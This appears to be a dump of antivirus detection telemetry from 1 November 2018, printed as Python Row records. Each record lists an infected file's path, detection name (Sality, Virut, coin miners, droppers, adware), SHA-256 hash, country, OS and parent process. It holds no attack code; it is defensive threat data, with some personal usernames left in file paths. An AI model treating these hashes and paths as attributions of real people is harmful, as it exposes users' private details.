  Row(detection=Row(filename='ccf1.tmp.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\ccf1.tmp.exe', filesize=584000, name='TR/Dropper.VB.d50e31.#M1.#R1'), hash='d50e31534edead41ed9449f6c89feddb29fc729ec79f8275d84501190efc0859', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T22:27:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204021-790905ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4663d008\\AVSCAN-20181101-203944-58D3C140\\AVSCAN-20181101-204021-790905AC', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='af99183084545233d4b17adf4b8ac6981e4800616674b17dad32b20577933911', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:40:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='covers.exe', filepath='G:\\Android\\data\\org.videolan.vlc\\cache\\covers.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:55:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081046-904a2571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-081046-904A2571', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igohnz5ptosc.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Q72b3mECjZq12zf0\\igohnZ5ptoSc.exe', filesize=576000, name='HEUR/AGEN.1024618.#M1.#R1'), hash='df51caf4f72b8e4fad3e5afa11d40330cb554b5f6d67544891976283798597e3', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:02:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235717-6568764f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-235655-622049BD\\AVSCAN-20181101-235717-6568764F', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:58:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fiwllc.exe', filepath='C:\\Windows\\SysWOW64\\fiwllc.exe', filesize=576000, name='HEUR/AGEN.1024618.#M1.#R1'), hash='df51caf4f72b8e4fad3e5afa11d40330cb554b5f6d67544891976283798597e3', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Downloads\\K.J_121026.exe', parentsize=33481218, timestamp='2018-11-01T20:29:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f_01a656', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_01a656', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='99e802a254768b58e1b71de1966b4411b0eb2007f33ccfbced3b857646805822', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T09:48:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxsetup.exe', filepath='i:\\العاب\\الرجل الشجاع\\directx\\DXSETUP.EXE', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='8160e6db2b3438931c31b70e5f88087f6f62ca5aa33cbcb35f33586a3fb334b6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:09:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105149-2daad1eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_597256d4\\AVSCAN-20181101-104821-1B7B9DD1\\AVSCAN-20181101-105149-2DAAD1EB', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='d8153cbe750aa7d505ba84c574f9e188fde10a92a400b1d2450b08843a7e1c6f', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-024911-9a4a5f88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d265d3ba\\AVSCAN-20181102-024828-93CDD881\\AVSCAN-20181102-024911-9A4A5F88', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xscsh.dll', filepath='C:\\WINDOWS\\system32\\xscsh.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:57:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204004-69d49c74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4663d008\\AVSCAN-20181101-203944-58D3C140\\AVSCAN-20181101-204004-69D49C74', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='5eb4196ba6cc00f5eec70e214d8c069ce03af20e0364d79642d551531721287a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:40:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='blankandsecure.exe', filepath='K:\\HBCD\\Programs\\BLANKANDSECURE.EXE', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3933184, timestamp='2018-11-01T17:00:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='js.scr', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\js\\js.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='overseer.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\avast software\\overseer\\overseer.exe', filesize=1664000, name='W32/Sality.Patched.#M1.#R1'), hash='680994ce4d9dcb697b40aa51d62c5f3128c589b96e6c8720503b3d5e4484bebc', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184024-5d03a374', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-184021-5C9E6719\\AVSCAN-20181101-184024-5D03A374', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:40:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allfake.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-D5GS0.tmp\\AllFake.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:38:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tcupdater.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\TCSystem\\TCUpdater.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='2778037bc22ff4333facb7e8bedea1523bd7a63a6a7476142b497339a65d269e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:18:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='40a.exe', filepath='F:\\New folder\\Corel Draw 12\\40a\\40a.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.907\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.907\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:58:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b2aa7', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b2aa7', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:53:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002535-4caf2eab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002535-4CAF2EAB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170306-68f263fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-170306-68F263FC', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:03:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30E1137F37F4C90814E8B85325D0453B172E8DF5E31C256975FE6225A448A358', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:37:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:04:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-070520-f9aa6c90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_328b17cb\\AVSCAN-20181101-070503-F741C32E\\AVSCAN-20181101-070520-F9AA6C90', filesize=512000, name='TR/Crypt.ZPACK.Gen2.100871.#M1.#R1'), hash='5d15c8a10de097152559adebf4acac95b4b9b6fbc2fe0670157a1d57b05e38d9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:05:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000ae374', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000ae374', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:50:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:19:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jabswitch.exe', filepath='C:\\Program Files\\Java\\jdk1.8.0_60\\bin\\jabswitch.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='3a01221831aee979c73998f308f3fe2a8652246fcbe8d6217b18b631aec7fcf7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:28:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='c:\\users\\X\\downloads\\setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:37:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bein online.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa780.20804\\bein online.exe', filesize=768000, name='TR/Dldr.Zampol.75e966.#M1.#R1'), hash='75e9662275fd9a5eeb9c632ff17ca43dba27480b6123c70517609ebb6e0d51e1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2232776, timestamp='2018-11-01T20:47:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:40:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='moviemk.exe', filepath='D:\\Backup\\Windows\\system32\\dllcache\\moviemk.exe', filesize=3776000, name='W32/Sality.AT.#M1.#R1'), hash='10fab618039facb8d810eae0dea6ccb1fd9440b7bba5ae6dfc380984088af115', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wwff.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\istE54F.tmp\\tools\\wwff.exe', filesize=624000, name='HEUR/AGEN.1011425.#M1.#R1'), hash='2cd623a10896ee766e9ff87a28b56b321d54742939917e1527270122069e1889', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:47:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:27:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bartolozzi ultimo.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\analisi BARTOLOZZI\\bartolozzi ultimo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094018-cf029cab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094018-CF029CAB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:40:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151431-335160d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151431-335160D5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094423-fde7d65f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094423-FDE7D65F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:44:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='107_fuji.exe', filepath='E:\\picture\\summer\\107_FUJI\\107_FUJI.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='887d290e53469b0d5ae11733ae63d6f3c9b7fcc382bb8f5fb8c340e547b5e9aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rarrepairtool.exe', filepath='K:\\HBCD\\Programs\\RARREPAIRTOOL.EXE', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\c2zuhbwogdg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541053788.5bda9d5cf0cff', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Backs\\654075719.exe', parentsize=671232, timestamp='2018-11-01T08:31:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsl77E0.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T21:32:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194714-4d2c1949', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194714-4D2C1949', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\dw\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:KEpfKUcCvUGz6A9p.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T14:25:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b654b8e22edcf1fb46d802766fd3b7eac211e69b7603f4f69b3651aee19775a7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\B654B8E22EDCF1FB46D802766FD3B7EAC211E69B7603F4F69B3651AEE19775A7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b654b8e22edcf1fb46d802766fd3b7eac211e69b7603f4f69b3651aee19775a7', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wdm.exe', filepath='E:\\driver\\dellinspiron1440driversoundxp\\Audio\\WDM\\WDM.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='bcb122bf7fe46768bbfbb62c91c2d67de44eb5875545df06c4f2789b45687650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:54Z'), dt=datetime.date(2018, 11, 1)),
